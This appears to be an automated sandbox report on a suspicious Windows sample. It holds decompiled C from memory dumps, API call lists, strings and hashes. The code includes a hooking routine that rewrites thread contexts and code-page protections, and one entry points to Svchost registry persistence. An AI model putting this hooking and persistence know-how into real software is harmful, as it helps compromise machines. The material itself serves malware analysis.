    								}
    								 *((intOrPtr*)(_t53 - 4)) = 0xfffffffe;
    								E2FF11AD9(_t50);
    							}
    							goto L20;
    						}
    						_t36 = E2FF11974("GetModuleHandleExW");
    						if(_t36 == _t50) {
    							goto L21;
    						}
    						_push(_t53 - 0x230);
    						_push(0x2ff13000);
    						_push(6);
    						if( *_t36() == 0) {
    							goto L21;
    						}
    						 *((short*)(_t53 - 0x1e)) = 0;
    						 *((short*)(_t53 - 0x20)) = 0;
    						if(GetModuleFileNameW( *(_t53 - 0x230), _t53 - 0x228, 0x105) == _t50) {
    							goto L21;
    						}
    						if( *((intOrPtr*)(_t53 - 0x20)) != _t50) {
    							SetLastError(0x6f);
    							goto L21;
    						}
    						 *((intOrPtr*)(_t53 - 0x258)) = 0x20;
    						 *((intOrPtr*)(_t53 - 0x254)) = 0x88;
    						 *((intOrPtr*)(_t53 - 0x250)) = _t53 - 0x228;
    						 *((intOrPtr*)(_t53 - 0x244)) = 3;
    						 *(_t53 - 0x23c) =  *(_t53 - 0x230);
    						_push(_t53 - 0x258); // executed
    						_t30 = E2FF11A2C(); // executed
    						 *(_t53 - 0x238) = _t30;
    						if(_t30 != 0xffffffff) {
    							L16:
    							 *0x2ff1301c = 1;
    							goto L17;
    						}
    						_t44 = GetLastError();
    						if(_t44 == 0x714 || _t44 == 0x715 || _t44 == 0x717 || _t44 == 0x716) {
    							_t30 = 0;
    							 *(_t53 - 0x238) = 0;
    							goto L16;
    						} else {
    							goto L21;
    						}
    					}
    					_t28 = E2FF11974("QueryActCtxW");
    					 *0x2ff13040 = _t28;
    					if(_t28 == 0) {
    						goto L21;
    					}
    					goto L4;
    				}
    			}









    0x2ff11716
    0x2ff11716
    0x2ff11716
    0x2ff1171b
    0x2ff11720
    0x2ff11725
    0x2ff11727
    0x2ff11733
    0x2ff118be
    0x2ff118c0
    0x00000000
    0x2ff11746
    0x2ff11746
    0x2ff1174d
    0x2ff11766
    0x2ff11766
    0x2ff11767
    0x2ff1176f
    0x2ff11770
    0x2ff11772
    0x2ff11773
    0x2ff11778
    0x2ff11779
    0x2ff11782
    0x2ff118c1
    0x2ff118c8
    0x2ff118c8
    0x2ff11788
    0x2ff11790
    0x2ff11871
    0x2ff11871
    0x2ff1187c
    0x2ff1187d
    0x2ff11885
    0x2ff11887
    0x2ff1188a
    0x2ff1189a
    0x2ff1189b
    0x2ff118a0
    0x2ff118a1
    0x2ff118a3
    0x2ff118a4
    0x2ff118ac
    0x2ff11c21
    0x2ff11c21
    0x2ff118b2
    0x2ff118b9
    0x2ff118b9
    0x00000000
    0x2ff11885
    0x2ff1179b
    0x2ff117a2
    0x00000000
    0x00000000
    0x2ff117ae
    0x2ff117af
    0x2ff117b0
    0x2ff117b6
    0x00000000
    0x00000000
    0x2ff117be
    0x2ff117c2
    0x2ff117e0
    0x00000000
    0x00000000
    0x2ff117ea
    0x2ff11c15
    0x00000000
    0x2ff11c15
    0x2ff117f0
    0x2ff117fa
    0x2ff1180a
    0x2ff11810
    0x2ff11820
    0x2ff1182c
    0x2ff1182d
    0x2ff11832
    0x2ff1183b
    0x2ff11867
    0x2ff11867
    0x00000000
    0x2ff11867
    0x2ff1183d
    0x2ff11848
    0x2ff1185f
    0x2ff11861
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x2ff11848
    0x2ff11754
    0x2ff11759
    0x2ff11760
    0x00000000
    0x00000000
    0x00000000
    0x2ff11760

    APIs
    • GetModuleFileNameW.KERNEL32(?,?,00000105,?,2FF1167B,?,2FF116A8,00000010,2FF115AD,wwlib.dll,2FF13074,?,2FF1159A,2FF10000,00000000,00000001), ref: 2FF117D8
    • GetLastError.KERNEL32(00000020), ref: 2FF1183D
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.462834723.000000002FF11000.00000020.00020000.sdmp, Offset: 2FF10000, based on PE: true
    • Associated: 00000002.00000002.462824849.000000002FF10000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.462857250.000000002FF14000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463124095.000000002FF90000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463277628.000000002FFCD000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463417896.000000003003D000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: ErrorFileLastModuleName
    • String ID: $@$Comctl32.dll$GetModuleHandleExW$QueryActCtxW
    • API String ID: 2776309574-2626125606
    • Opcode ID: 10dbc6b8630cf392a1083fe35c2cd66d9d46a02b06138a90d2708675cd72aadb
    • Instruction ID: a597de822cc7f496c06c0c414d4b47c2901e0b5faa3ba4e298254e135f3987b7
    • Opcode Fuzzy Hash: 10dbc6b8630cf392a1083fe35c2cd66d9d46a02b06138a90d2708675cd72aadb
    • Instruction Fuzzy Hash: B7413030900614ABFB60DB658C88BDB7BBEAF44364F114699E118E6290DB789B84CF65
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6D862D80(intOrPtr* _a4) {
    				signed int _v8;
    				struct _CONTEXT _v724;
    				void* _v728;
    				void* _v732;
    				intOrPtr _v736;
    				void* _v740;
    				void* _v744;
    				void* _v748;
    				void* _v752;
    				void* _v756;
    				void* _v760;
    				long _v764;
    				void* __ebp;
    				signed int _t136;
    				void* _t139;
    				void* _t142;
    				intOrPtr _t145;
    				void* _t165;
    				void* _t173;
    				signed char _t180;
    				intOrPtr _t189;
    				intOrPtr _t238;
    				void* _t239;
    				void* _t240;
    				signed int _t273;
    				void* _t274;
    
    				_t136 =  *0x6d877014; // 0x6a907f72
    				_v8 = _t136 ^ _t273;
    				if(_a4 != 0) {
    					_t238 =  *0x6d8c101c; // 0x0
    					 *_a4 = _t238;
    				}
    				if( *0x6d8c1014 == GetCurrentThreadId()) {
    					if( *0x6d8c1018 == 0) {
    						_v740 = 0;
    						_t239 =  *0x6d8c1024; // 0x0
    						_v728 = _t239;
    						while(_v728 != 0) {
    							if( *((intOrPtr*)(_v728 + 4)) == 0) {
    								_v736 = E6D861DA0( *((intOrPtr*)( *(_v728 + 0x10) + 0x44)),  *(_v728 + 0xc),  *((intOrPtr*)( *(_v728 + 0x10) + 0x44)));
    								_t189 = E6D861D70(_v736,  *((intOrPtr*)( *(_v728 + 0x10) + 0x40)));
    								_t274 = _t274 + 0x10;
    								_v736 = _t189;
    								 *( *(_v728 + 8)) =  *(_v728 + 0x10);
    							} else {
    								E6D8659E0( *(_v728 + 0xc),  *(_v728 + 0x10) + 0x20,  *( *(_v728 + 0x10) + 0x36) & 0x000000ff);
    								_t274 = _t274 + 0xc;
    								 *( *(_v728 + 8)) =  *(_v728 + 0xc);
    							}
    							_v728 =  *_v728;
    						}
    						_t139 =  *0x6d8c1020; // 0x0
    						_v732 = _t139;
    						while(_v732 != 0) {
    							_v724.ContextFlags = 0x10001;
    							if(GetThreadContext( *(_v732 + 4),  &_v724) != 0) {
    								_t165 =  *0x6d8c1024; // 0x0
    								_v728 = _t165;
    								while(_v728 != 0) {
    									if( *((intOrPtr*)(_v728 + 4)) == 0) {
    										if(_v724.Eip >=  *(_v728 + 0xc) && _v724.Eip <  *(_v728 + 0xc) + ( *( *(_v728 + 0x10) + 0x36) & 0x000000ff)) {
    											_t173 = E6D861570(_v724.Eip -  *(_v728 + 0xc) & 0x000000ff,  *(_v728 + 0x10), _v724.Eip -  *(_v728 + 0xc) & 0x000000ff);
    											_t274 = _t274 + 8;
    											_v724.Eip = _t173 +  *(_v728 + 0x10);
    											SetThreadContext( *(_v732 + 4),  &_v724);
    										}
    									} else {
    										if(_v724.Eip >=  *(_v728 + 0x10) && _v724.Eip <  *(_v728 + 0x10) + 4) {
    											_t180 = E6D8615C0(_v728,  *(_v728 + 0x10), _v724.Eip -  *(_v728 + 0x10));
    											_t274 = _t274 + 8;
    											_v724.Eip =  *(_v728 + 0xc) + (_t180 & 0x000000ff);
    											SetThreadContext( *(_v732 + 4),  &_v724);
    										}
    									}
    									_v728 =  *_v728;
    								}
    							}
    							_v732 =  *_v732;
    						}
    						_v756 = GetCurrentProcess();
    						_t240 =  *0x6d8c1024; // 0x0
    						_v728 = _t240;
    						while(_v728 != 0) {
    							VirtualProtect( *(_v728 + 0xc),  *( *(_v728 + 0x10) + 0x36) & 0x000000ff,  *(_v728 + 0x14),  &_v764); // executed
    							FlushInstructionCache(_v756,  *(_v728 + 0xc),  *( *(_v728 + 0x10) + 0x36) & 0x000000ff);
    							if( *((intOrPtr*)(_v728 + 4)) != 0 &&  *(_v728 + 0x10) != 0) {
    								E6D861CC0(_v728,  *(_v728 + 0x10));
    								_t274 = _t274 + 4;
    								 *(_v728 + 0x10) = 0;
    								_v740 = 1;
    							}
    							_v752 =  *_v728;
    							_v744 = _v728;
    							L6D864090(_v744);
    							_t274 = _t274 + 4;
    							_v728 = _v752;
    						}
    						 *0x6d8c1024 = 0;
    						if(_v740 != 0 &&  *0x6d8c1010 == 0) {
    							E6D861D00(); // executed
    						}
    						E6D8625A0();
    						_t142 =  *0x6d8c1020; // 0x0
    						_v732 = _t142;
    						while(_v732 != 0) {
    							ResumeThread( *(_v732 + 4));
    							_v748 =  *_v732;
    							_v760 = _v732;
    							L6D864090(_v760);
    							_t274 = _t274 + 4;
    							_v732 = _v748;
    						}
    						 *0x6d8c1020 = 0;
    						 *0x6d8c1014 = 0;
    						if(_a4 != 0) {
    							_t145 =  *0x6d8c101c; // 0x0
    							 *_a4 = _t145;
    						}
    					} else {
    						E6D862C10();
    					}
    				} else {
    				}
    				return E6D864095(_v8 ^ _t273);
    			}





























    0x6d862d89
    0x6d862d90
    0x6d862d97
    0x6d862d9c
    0x6d862da2
    0x6d862da2
    0x6d862daf
    0x6d862dc2
    0x6d862dd3
    0x6d862ddd
    0x6d862de3
    0x6d862df9
    0x6d862e10
    0x6d862e74
    0x6d862e8e
    0x6d862e93
    0x6d862e96
    0x6d862eae
    0x6d862e12
    0x6d862e37
    0x6d862e3c
    0x6d862e51
    0x6d862e51
    0x6d862df3
    0x6d862df3
    0x6d862eb5
    0x6d862eba
    0x6d862ed0
    0x6d862edd
    0x6d862eff
    0x6d862f05
    0x6d862f0a
    0x6d862f20
    0x6d862f37
    0x6d862fb9
    0x6d862ff6
    0x6d862ffb
    0x6d863007
    0x6d86301e
    0x6d86301e
    0x6d862f39
    0x6d862f48
    0x6d862f78
    0x6d862f7d
    0x6d862f8c
    0x6d862fa3
    0x6d862fa3
    0x6d862fa8
    0x6d862f1a
    0x6d862f1a
    0x6d862f20
    0x6d862eca
    0x6d862eca
    0x6d863032
    0x6d863038
    0x6d86303e
    0x6d863044
    0x6d86307a
    0x6d86309e
    0x6d8630ad
    0x6d8630c5
    0x6d8630ca
    0x6d8630d3
    0x6d8630da
    0x6d8630da
    0x6d8630ec
    0x6d8630f8
    0x6d863105
    0x6d86310a
    0x6d863113
    0x6d863113
    0x6d86311e
    0x6d86312f
    0x6d86313a
    0x6d86313a
    0x6d86313f
    0x6d863144
    0x6d863149
    0x6d86314f
    0x6d863162
    0x6d86316f
    0x6d86317b
    0x6d863188
    0x6d86318d
    0x6d863196
    0x6d863196
    0x6d86319e
    0x6d8631a8
    0x6d8631b6
    0x6d8631bb
    0x6d8631c0
    0x6d8631c0
    0x6d862dc4
    0x6d862dc4
    0x6d862dc9
    0x6d862db1
    0x6d862db1
    0x6d8631d4

    APIs
    • GetCurrentThreadId.KERNEL32 ref: 6D862DA4
    • GetThreadContext.KERNEL32(?,00010001), ref: 6D862EF8
      • Part of subcall function 6D862C10: GetCurrentThreadId.KERNEL32 ref: 6D862C16
    Memory Dump Source
    • Source File: 00000002.00000002.463521562.000000006D861000.00000020.00020000.sdmp, Offset: 6D860000, based on PE: true
    • Associated: 00000002.00000002.463511963.000000006D860000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463537998.000000006D870000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463547042.000000006D877000.00000004.00020000.sdmp Download File
    • Associated: 00000002.00000002.463553944.000000006D8BF000.00000004.00020000.sdmp Download File
    • Associated: 00000002.00000002.463561012.000000006D8C2000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463569843.000000006D8C5000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: Thread$Current$Context
    • String ID:
    • API String ID: 1666949209-0
    • Opcode ID: a42a0da9f61c5e18480b4f78723cc191d834d19cb31f9382583d977cc7cc374c
    • Instruction ID: 2e4feddb0ad3a8bb5f436d94284940345f5685eb803a71801285d81594f08716
    • Opcode Fuzzy Hash: a42a0da9f61c5e18480b4f78723cc191d834d19cb31f9382583d977cc7cc374c
    • Instruction Fuzzy Hash: 9EC13B74A0425ACFCB64DF18C98CB99B3B1BB49314F1089DAE509AB351C734EE81CFA0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 92%
    			E6D86476E(void* __edx, void* __eflags) {
    				intOrPtr _t34;
    				signed int _t40;
    				signed int _t41;
    				signed int _t42;
    				signed int _t45;
    				signed char _t54;
    				signed int _t56;
    				signed int _t57;
    				void* _t60;
    				void* _t67;
    				signed int _t70;
    				void* _t73;
    				signed int _t74;
    				signed int _t78;
    				void* _t80;
    
    				_t67 = __edx;
    				E6D864EC0(0x6d875510, 0x10);
    				_t34 =  *0x6d8c1074; // 0x1
    				if(_t34 > 0) {
    					 *0x6d8c1074 = _t34 - 1;
    					 *(_t80 - 0x1c) = 1;
    					 *(_t80 - 4) =  *(_t80 - 4) & 0x00000000;
    					 *((char*)(_t80 - 0x20)) = E6D86430D();
    					 *(_t80 - 4) = 1;
    					__eflags =  *0x6d8c1050 - 2;
    					if( *0x6d8c1050 != 2) {
    						E6D864A9B(_t67, 1, _t73, 7);
    						asm("int3");
    						E6D864EC0(0x6d875538, 0xc);
    						_t70 =  *(_t80 + 0xc);
    						__eflags = _t70;
    						if(_t70 != 0) {
    							L9:
    							 *(_t80 - 4) =  *(_t80 - 4) & 0x00000000;
    							__eflags = _t70 - 1;
    							if(_t70 == 1) {
    								L12:
    								_t57 =  *(_t80 + 0x10);
    								_t74 = E6D864929( *((intOrPtr*)(_t80 + 8)), _t70, _t57);
    								 *(_t80 - 0x1c) = _t74;
    								__eflags = _t74;
    								if(_t74 != 0) {
    									_t41 = E6D864614(_t60, _t67,  *((intOrPtr*)(_t80 + 8)), _t70, _t57); // executed
    									_t74 = _t41;
    									 *(_t80 - 0x1c) = _t74;
    									__eflags = _t74;
    									if(_t74 != 0) {
    										goto L14;
    									}
    								}
    							} else {
    								__eflags = _t70 - 2;
    								if(_t70 == 2) {
    									goto L12;
    								} else {
    									_t57 =  *(_t80 + 0x10);
    									L14:
    									_push(_t57);
    									_t42 = E6D861400( *((intOrPtr*)(_t80 + 8)), _t70); // executed
    									_t74 = _t42;
    									 *(_t80 - 0x1c) = _t74;
    									__eflags = _t70 - 1;
    									if(_t70 == 1) {
    										__eflags = _t74;
    										if(_t74 == 0) {
    											_push(_t57);
    											_t45 = E6D861400( *((intOrPtr*)(_t80 + 8)), _t42);
    											__eflags = _t57;
    											_t25 = _t57 != 0;
    											__eflags = _t25;
    											_push((_t45 & 0xffffff00 | _t25) & 0x000000ff);
    											E6D86476E(_t67, _t25);
    											_pop(_t60);
    											E6D864929( *((intOrPtr*)(_t80 + 8)), _t74, _t57);
    										}
    									}
    									__eflags = _t70;
    									if(_t70 == 0) {
    										L19:
    										_t74 = E6D864614(_t60, _t67,  *((intOrPtr*)(_t80 + 8)), _t70, _t57);
    										 *(_t80 - 0x1c) = _t74;
    										__eflags = _t74;
    										if(_t74 != 0) {
    											_t74 = E6D864929( *((intOrPtr*)(_t80 + 8)), _t70, _t57);
    											 *(_t80 - 0x1c) = _t74;
    										}
    									} else {
    										__eflags = _t70 - 3;
    										if(_t70 == 3) {
    											goto L19;
    										}
    									}
    								}
    							}
    							 *(_t80 - 4) = 0xfffffffe;
    							_t40 = _t74;
    						} else {
    							__eflags =  *0x6d8c1074 - _t70; // 0x1
    							if(__eflags > 0) {
    								goto L9;
    							} else {
    								_t40 = 0;
    							}
    						}
    						 *[fs:0x0] =  *((intOrPtr*)(_t80 - 0x10));
    						return _t40;
    					} else {
    						E6D8643D8(_t60);
    						E6D864FBC();
    						E6D865024();
    						 *0x6d8c1050 =  *0x6d8c1050 & 0x00000000;
    						 *(_t80 - 4) =  *(_t80 - 4) & 0x00000000;
    						E6D864803();
    						_t54 = E6D864579( *((intOrPtr*)(_t80 + 8)), 0);
    						asm("sbb esi, esi");
    						_t78 =  ~(_t54 & 0x000000ff) & 1;
    						__eflags = _t78;
    						 *(_t80 - 0x1c) = _t78;
    						 *(_t80 - 4) = 0xfffffffe;
    						E6D864810();
    						_t56 = _t78;
    						goto L4;
    					}
    				} else {
    					_t56 = 0;
    					L4:
    					 *[fs:0x0] =  *((intOrPtr*)(_t80 - 0x10));
    					return _t56;
    				}
    			}


















    0x6d86476e
    0x6d864775
    0x6d86477a
    0x6d864781
    0x6d864788
    0x6d864790
    0x6d864793
    0x6d86479c
    0x6d86479f
    0x6d8647a2
    0x6d8647a9
    0x6d864818
    0x6d86481d
    0x6d864825
    0x6d86482a
    0x6d86482d
    0x6d86482f
    0x6d864840
    0x6d864840
    0x6d864844
    0x6d864847
    0x6d864853
    0x6d864853
    0x6d864860
    0x6d864862
    0x6d864865
    0x6d864867
    0x6d864872
    0x6d864877
    0x6d864879
    0x6d86487c
    0x6d86487e
    0x00000000
    0x00000000
    0x6d86487e
    0x6d864849
    0x6d864849
    0x6d86484c
    0x00000000
    0x6d86484e
    0x6d86484e
    0x6d864884
    0x6d864884
    0x6d864889
    0x6d86488e
    0x6d864890
    0x6d864893
    0x6d864896
    0x6d864898
    0x6d86489a
    0x6d86489c
    0x6d8648a1
    0x6d8648a6
    0x6d8648a8
    0x6d8648a8
    0x6d8648ae
    0x6d8648af
    0x6d8648b4
    0x6d8648ba
    0x6d8648ba
    0x6d86489a
    0x6d8648bf
    0x6d8648c1
    0x6d8648c8
    0x6d8648d2
    0x6d8648d4
    0x6d8648d7
    0x6d8648d9
    0x6d8648e5
    0x6d86490d
    0x6d86490d
    0x6d8648c3
    0x6d8648c3
    0x6d8648c6
    0x00000000
    0x00000000
    0x6d8648c6
    0x6d8648c1
    0x6d86484c
    0x6d864910
    0x6d864917
    0x6d864831
    0x6d864831
    0x6d864837
    0x00000000
    0x6d864839
    0x6d864839
    0x6d864839
    0x6d864837
    0x6d86491c
    0x6d864928
    0x6d8647ab
    0x6d8647ab
    0x6d8647b0
    0x6d8647b5
    0x6d8647ba
    0x6d8647c1
    0x6d8647c5
    0x6d8647cf
    0x6d8647db
    0x6d8647dd
    0x6d8647dd
    0x6d8647df
    0x6d8647e2
    0x6d8647e9
    0x6d8647ee
    0x00000000
    0x6d8647ee
    0x6d864783
    0x6d864783
    0x6d8647f0
    0x6d8647f3
    0x6d8647ff
    0x6d8647ff

    APIs
    • __RTC_Initialize.LIBCMT ref: 6D8647B5
    • ___scrt_uninitialize_crt.LIBCMT ref: 6D8647CF
    Memory Dump Source
    • Source File: 00000002.00000002.463521562.000000006D861000.00000020.00020000.sdmp, Offset: 6D860000, based on PE: true
    • Associated: 00000002.00000002.463511963.000000006D860000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463537998.000000006D870000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463547042.000000006D877000.00000004.00020000.sdmp Download File
    • Associated: 00000002.00000002.463553944.000000006D8BF000.00000004.00020000.sdmp Download File
    • Associated: 00000002.00000002.463561012.000000006D8C2000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463569843.000000006D8C5000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: Initialize___scrt_uninitialize_crt
    • String ID:
    • API String ID: 2442719207-0
    • Opcode ID: fe1c52463cbf93edc49ec56ba937447412c934cbe239306ac08286ddb7ada7b8
    • Instruction ID: beed3c7df13c6264b61e8ccf1e31cc29ae02c1eb2f1800f8093eaeaa3ae84d74
    • Opcode Fuzzy Hash: fe1c52463cbf93edc49ec56ba937447412c934cbe239306ac08286ddb7ada7b8
    • Instruction Fuzzy Hash: F041B372D0C2D9EADB118F9DD818B7E76B5EBC9B79F014919F51557250C73049018BB0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 72%
    			E2FF1135B() {
    				signed int _t10;
    				int _t11;
    				void* _t17;
    				intOrPtr _t20;
    				intOrPtr* _t21;
    				signed int _t28;
    				signed int _t29;
    				void* _t31;
    				intOrPtr _t35;
    
    				_t31 =  *0x2ff10000 - 0x5a4d; // 0x5a4d
    				if(_t31 != 0) {
    					L9:
    					_t10 = 0;
    				} else {
    					_t20 =  *0x2ff1003c; // 0x100
    					_t1 = _t20 + 0x2ff10000; // 0x4550
    					_t21 = _t1;
    					if( *_t21 != 0x4550) {
    						goto L9;
    					} else {
    						_t28 =  *(_t21 + 0x18) & 0x0000ffff;
    						if(_t28 != 0x10b) {
    							if(_t28 != 0x20b ||  *((intOrPtr*)(_t21 + 0x84)) <= 0xe) {
    								goto L9;
    							} else {
    								_t29 = 0;
    								goto L5;
    							}
    						} else {
    							if( *((intOrPtr*)(_t21 + 0x74)) <= 0xe) {
    								goto L9;
    							} else {
    								_t29 = 0;
    								_t35 =  *((intOrPtr*)(_t21 + 0xe8));
    								L5:
    								_t10 = _t29 & 0xffffff00 | _t35 != 0x00000000;
    							}
    						}
    					}
    				}
    				 *0x2ff13050 = _t10;
    				_t11 = __set_app_type(2);
    				__imp___encode_pointer(0xffffffff); // executed
    				 *0x2ff13078 = _t11;
    				 *0x2ff1307c = _t11;
    				 *(__p__fmode()) =  *0x2ff13068;
    				 *(__p__commode()) =  *0x2ff13064;
    				 *0x2ff1306c =  *_adjust_fdiv;
    				E2FF11424();
    				_t17 = E2FF11448();
    				if( *0x2ff1300c == 0) {
    					__setusermatherr(E2FF11448);
    				}
    				E2FF1144B(_t17);
    				if( *0x2ff13008 == 0xffffffff) {
    					__imp___configthreadlocale(0xffffffff);
    				}
    				return 0;
    			}












    0x2ff11360
    0x2ff11367
    0x2ff11420
    0x2ff11420
    0x2ff1136d
    0x2ff1136d
    0x2ff11372
    0x2ff11372
    0x2ff1137e
    0x00000000
    0x2ff11384
    0x2ff11384
    0x2ff1138e
    0x2ff11e2f
    0x00000000
    0x2ff11e42
    0x2ff11e42
    0x00000000
    0x2ff11e44
    0x2ff11394
    0x2ff11398
    0x00000000
    0x2ff1139e
    0x2ff1139e
    0x2ff113a0
    0x2ff113a6
    0x2ff113a9
    0x2ff113a9
    0x2ff11398
    0x2ff1138e
    0x2ff1137e
    0x2ff113ad
    0x2ff113b2
    0x2ff113ba
    0x2ff113c2
    0x2ff113c7
    0x2ff113d8
    0x2ff113e6
    0x2ff113ef
    0x2ff113f4
    0x2ff113f9
    0x2ff11405
    0x2ff11e54
    0x2ff11e5a
    0x2ff1140b
    0x2ff11417
    0x2ff11e62
    0x2ff11e68
    0x2ff1141f

    APIs
    Memory Dump Source
    • Source File: 00000002.00000002.462834723.000000002FF11000.00000020.00020000.sdmp, Offset: 2FF10000, based on PE: true
    • Associated: 00000002.00000002.462824849.000000002FF10000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.462857250.000000002FF14000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463124095.000000002FF90000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463277628.000000002FFCD000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463417896.000000003003D000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: __p__commode__p__fmode__set_app_type_encode_pointer
    • String ID:
    • API String ID: 3439008642-0
    • Opcode ID: eae7f326e990a0fac09d69ef8b1328373294b610aecdf584ce588f80061840d7
    • Instruction ID: a10fb9ceacb31bdfc199cbc2360c0d50a8c0e7f5196db4e788c1c36cde79e303
    • Opcode Fuzzy Hash: eae7f326e990a0fac09d69ef8b1328373294b610aecdf584ce588f80061840d7
    • Instruction Fuzzy Hash: 75213E71900241DFEB188B66E08865737EABB05B75F12426AE216C77A9D73994A0CB21
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • ExpandEnvironmentStringsA.KERNEL32(?,?,000000C8,?,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost,?), ref: 030313D6
    • GetTempFileNameA.KERNELBASE(?,edg,00000000,?,?,?,000000C8,?,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost,?), ref: 030313EB
    • DeleteFileA.KERNELBASE(?,?,?,?,000000C8,?,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost,?), ref: 030313F2
    Strings
    • SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost, xrefs: 030313B3
    • edg, xrefs: 030313DF
    Memory Dump Source
    • Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false
    Similarity
    • API ID: File$DeleteEnvironmentExpandNameStringsTemp
    • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost$edg
    • API String ID: 3636227868-1338781389
    • Opcode ID: b5f9f29737cbafc32133e3845507062f1409a6222b5256ecdf913c1d6d46e760
    • Instruction ID: 1c4a8aab0c50133d24e0a0badc805991657ad12034f7713648357cf3616427a4
    • Opcode Fuzzy Hash: b5f9f29737cbafc32133e3845507062f1409a6222b5256ecdf913c1d6d46e760
    • Instruction Fuzzy Hash: C8F090B5903218BBE720FB66ED09FDF7B7CDB45610F0001A5F508D3140DB789B098AA5
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Memory Dump Source
    • Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false
    Similarity
    • API ID: dllmain_raw$dllmain_crt_dispatch
    • String ID:
    • API String ID: 3136044242-0
    • Opcode ID: 557c67f5aede589354ffdf093c21a576e2342f59a3342b95eafde1c5d555becb
    • Instruction ID: 120e8e3e31fb29825ede697c49b028905a9fe156aca27a118e2be5387a13c59d
    • Opcode Fuzzy Hash: 557c67f5aede589354ffdf093c21a576e2342f59a3342b95eafde1c5d555becb
    • Instruction Fuzzy Hash: CC218175D03315EBDB61EE55CC85AAF7ABDEF86A90F094915F8146B210C3304D428BA0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 92%
    			E6D86481E(void* __edx, void* __eflags) {
    				signed int _t24;
    				signed int _t25;
    				signed int _t26;
    				signed int _t29;
    				signed int _t34;
    				void* _t36;
    				void* _t39;
    				signed int _t40;
    				signed int _t42;
    				void* _t44;
    				void* _t49;
    
    				_t39 = __edx;
    				E6D864EC0(0x6d875538, 0xc);
    				_t40 =  *(_t44 + 0xc);
    				if(_t40 != 0) {
    					L3:
    					 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
    					__eflags = _t40 - 1;
    					if(_t40 == 1) {
    						L6:
    						_t34 =  *(_t44 + 0x10);
    						_t42 = E6D864929( *((intOrPtr*)(_t44 + 8)), _t40, _t34);
    						 *(_t44 - 0x1c) = _t42;
    						__eflags = _t42;
    						if(_t42 == 0) {
    							L16:
    							 *(_t44 - 4) = 0xfffffffe;
    							_t24 = _t42;
    							L17:
    							 *[fs:0x0] =  *((intOrPtr*)(_t44 - 0x10));
    							return _t24;
    						}
    						_t25 = E6D864614(_t36, _t39,  *((intOrPtr*)(_t44 + 8)), _t40, _t34); // executed
    						_t42 = _t25;
    						 *(_t44 - 0x1c) = _t42;
    						__eflags = _t42;
    						if(_t42 == 0) {
    							goto L16;
    						}
    						L8:
    						_push(_t34);
    						_t26 = E6D861400( *((intOrPtr*)(_t44 + 8)), _t40); // executed
    						_t42 = _t26;
    						 *(_t44 - 0x1c) = _t42;
    						__eflags = _t40 - 1;
    						if(_t40 == 1) {
    							__eflags = _t42;
    							if(_t42 == 0) {
    								_push(_t34);
    								_t29 = E6D861400( *((intOrPtr*)(_t44 + 8)), _t26);
    								__eflags = _t34;
    								_t14 = _t34 != 0;
    								__eflags = _t14;
    								_push((_t29 & 0xffffff00 | _t14) & 0x000000ff);
    								E6D86476E(_t39, _t14);
    								_pop(_t36);
    								E6D864929( *((intOrPtr*)(_t44 + 8)), _t42, _t34);
    							}
    						}
    						__eflags = _t40;
    						if(_t40 == 0) {
    							L13:
    							_t42 = E6D864614(_t36, _t39,  *((intOrPtr*)(_t44 + 8)), _t40, _t34);
    							 *(_t44 - 0x1c) = _t42;
    							__eflags = _t42;
    							if(_t42 != 0) {
    								_t42 = E6D864929( *((intOrPtr*)(_t44 + 8)), _t40, _t34);
    								 *(_t44 - 0x1c) = _t42;
    							}
    							goto L16;
    						} else {
    							__eflags = _t40 - 3;
    							if(_t40 != 3) {
    								goto L16;
    							}
    							goto L13;
    						}
    					}
    					__eflags = _t40 - 2;
    					if(_t40 == 2) {
    						goto L6;
    					}
    					_t34 =  *(_t44 + 0x10);
    					goto L8;
    				}
    				_t49 =  *0x6d8c1074 - _t40; // 0x1
    				if(_t49 > 0) {
    					goto L3;
    				}
    				_t24 = 0;
    				goto L17;
    			}














    0x6d86481e
    0x6d864825
    0x6d86482a
    0x6d86482f
    0x6d864840
    0x6d864840
    0x6d864844
    0x6d864847
    0x6d864853
    0x6d864853
    0x6d864860
    0x6d864862
    0x6d864865
    0x6d864867
    0x6d864910
    0x6d864910
    0x6d864917
    0x6d864919
    0x6d86491c
    0x6d864928
    0x6d864928
    0x6d864872
    0x6d864877
    0x6d864879
    0x6d86487c
    0x6d86487e
    0x00000000
    0x00000000
    0x6d864884
    0x6d864884
    0x6d864889
    0x6d86488e
    0x6d864890
    0x6d864893
    0x6d864896
    0x6d864898
    0x6d86489a
    0x6d86489c
    0x6d8648a1
    0x6d8648a6
    0x6d8648a8
    0x6d8648a8
